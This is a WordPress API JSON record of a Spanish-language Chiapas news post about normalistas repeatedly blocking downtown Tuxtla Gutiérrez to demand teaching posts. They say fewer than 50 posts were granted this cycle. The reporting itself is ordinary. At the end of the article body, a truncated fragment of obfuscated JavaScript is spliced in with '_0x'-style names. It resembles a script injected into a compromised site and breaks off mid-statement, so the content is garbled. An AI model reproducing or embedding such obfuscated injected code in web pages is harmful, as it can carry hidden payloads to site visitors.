{"id":20769,"date":"2025-03-06T05:36:41","date_gmt":"2025-03-06T05:36:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20769"},"modified":"2025-03-06T05:36:42","modified_gmt":"2025-03-06T05:36:42","slug":"normalistas-no-dejan-de-exigir-plazas-y-bloquear-el-centro-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20769","title":{"rendered":"Normalistas no dejan de exigir plazas y bloquear el centro de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250305-WA0020-1024x768.jpg\" alt=\"\" class=\"wp-image-20770\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250305-WA0020-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250305-WA0020-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250305-WA0020-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250305-WA0020-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250305-WA0020-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>5 de marzo del 2025. -Desde temprano este mi\u00e9rcoles decenas de normalistas bloquearon el cruce de Calle y Avenida Central en el centro de Tuxtla Guti\u00e9rrez para pedir a las autoridades educativas se cumpla con el otorgamiento de plazas correspondientes al ciclo 2024-2025.<\/p>\n\n\n\n<p>Esta es la cuarta ocasi\u00f3n que bloquean este punto del coraz\u00f3n de la capital chiapaneca para se\u00f1alar que tras diferentes reuniones sostenidas con funcionarios estatales no hay voluntad para solucionar este tema.<\/p>\n\n\n\n<p>De acuerdo con el vocero del grupo, en este ciclo el n\u00famero de plazas que se han otorgado ha sido muy reducido que no han superado las 50 para todos los niveles.<\/p>\n\n\n\n<p>Esto contrasta con el aproximado de 300 plazas que se otorgan cada a\u00f1o, \u201cno entendemos hasta el momento el por qu\u00e9 del n\u00famero tan bajo otorgado en este 2025\u201d.<\/p>\n\n\n\n<p>\u201cEn comparaci\u00f3n del a\u00f1o pasado que para finales de febrero se hab\u00edan otorgado m\u00e1s de 80 plazas del nivel secundaria m\u00e1s otras 40 plazas por horas, pero este a\u00f1o apenas han sido cuatro o cinco que se han entregado\u201d, expres\u00f3 el vocero.<\/p>\n\n\n\n<p>Los normalistas consideran que existe una gran lentitud administrativa por parte de las autoridades y que los pretextos de la falta de espacios, alumnos y presupuesto son poco cre\u00edbles.<\/p>\n\n\n\n<p>A estas protestas en diferentes municipios por este tema se han sumado padres de familia, por el n\u00famero tan reducido de plazas que se ha liberado.<\/p>\n\n\n\n<p>\u201cNosotros estamos dispuestos a ir a cualquier comunidad para atender a los alumnos, a los ni\u00f1os de lugares que desgraciadamente no cuentan con maestros\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Por \u00faltimo dijo que est\u00e1n conscientes de que no pueda darse cobertura a la demanda total de las plazas que se requieren, sin embargo, seguir\u00e1n protestando<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 5 de marzo del 2025. -Desde temprano este mi\u00e9rcoles decenas de normalistas bloquearon el cruce de Calle y Avenida Central en el centro de Tuxtla Guti\u00e9rrez para pedir a las autoridades educativas se cumpla con el otorgamiento de plazas correspondientes al ciclo 2024-2025. Esta es la cuarta ocasi\u00f3n que bloquean este punto del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20770,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20769","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20769","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20769"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20769\/revisions"}],"predecessor-version":[{"id":20771,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20769\/revisions\/20771"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20770"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20769"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20769"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20769"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}